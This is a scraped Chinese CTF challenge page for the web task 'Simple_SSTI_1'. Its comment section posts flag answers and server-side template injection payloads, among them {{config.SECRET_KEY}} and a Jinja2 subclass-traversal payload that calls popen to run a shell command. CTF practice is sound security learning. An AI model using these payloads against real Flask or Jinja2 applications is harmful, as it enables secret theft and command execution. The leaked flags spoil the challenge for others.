Simple_SSTI_1WEB 未解决
分数:
5
金币:
2
题目作者:
valecalida
一 血:
dotast
一血奖励:
2金币
解 决:
28204
提 示:
描 述:
Simple_SSTI_1
评分(49)
解题动态

hackerbugku 攻破了该题 2天前

nihaolmb 攻破了该题 3天前

gfzt 攻破了该题 3天前

124要留就要77 攻破了该题 4天前

王者荣耀 攻破了该题 5天前

dengsf2025 攻破了该题 7天前

奔跑小马 攻破了该题 7天前

wywitkey 攻破了该题 8天前

123zp 攻破了该题 9天前

yy56 攻破了该题 10天前

qxq233 攻破了该题 12天前

19212014671 攻破了该题 13天前

NNuuNN 攻破了该题 14天前

The-Beacon 攻破了该题 15天前

breeding 攻破了该题 15天前

REZE 攻破了该题 16天前

2424291112 攻破了该题 16天前

soulchild 攻破了该题 17天前

临渊 攻破了该题 17天前

评论
不懂就问 1年前
举报
详细参考学习:https://blog.csdn.net/qq_36292543/article/details/136032550
hejichang 1年前
举报
flag{aced0e1bd96119f41a58510c28cfec11}
用涉大川 1年前
举报
每个人的flag都不一样,我的是flag{ddf1c0bc7f8ee46225efe4bf142c0079}
ccsuaw 1年前
举报
SECRET_KEY是什么? SECRET_KEY其实就是一个加密盐,用在django和flask的session、cookies等加密中。 所以payload为?flag={{config.SECRET_KEY}} 为什么是config.SECRET_KEY? 因为一般定义SECRET_KEY的config.py的源码是这样的: class Config(objec
18483555203 1年前
举报
flag{16346b3ff029db0cedd2d4d2df81df5a}
2027347950 1年前
举报
?flag={{''.__class__.__base__.__subclasses__()[127].__init__.__globals__['popen']('echo $FLAG').read()}}
iii1 1年前
举报
?flag={{''.__class__.__base__.__subclasses__()[127].__init__.__globals__['popen']('echo $FLAG').read()}}
DragonWE 1年前
举报
flag{9c260fb48e0a0db7708b6f3ebe9ff732}
iain4048 1年前
举报
查看源代码提示找secret key value
13663536751 1年前
举报
flag{e0ad0234936fcd15f11c7bb0f9d587e7}
2346254613 1年前
举报
这个是答案吗
啊这这 1年前
举报
使用{{config}}获得flag,因为config是用来获取当前配置的,配置主要有cookie名字和值之类的,这里的flag就是存放在cookie中(个人理解,如果不对请矫正)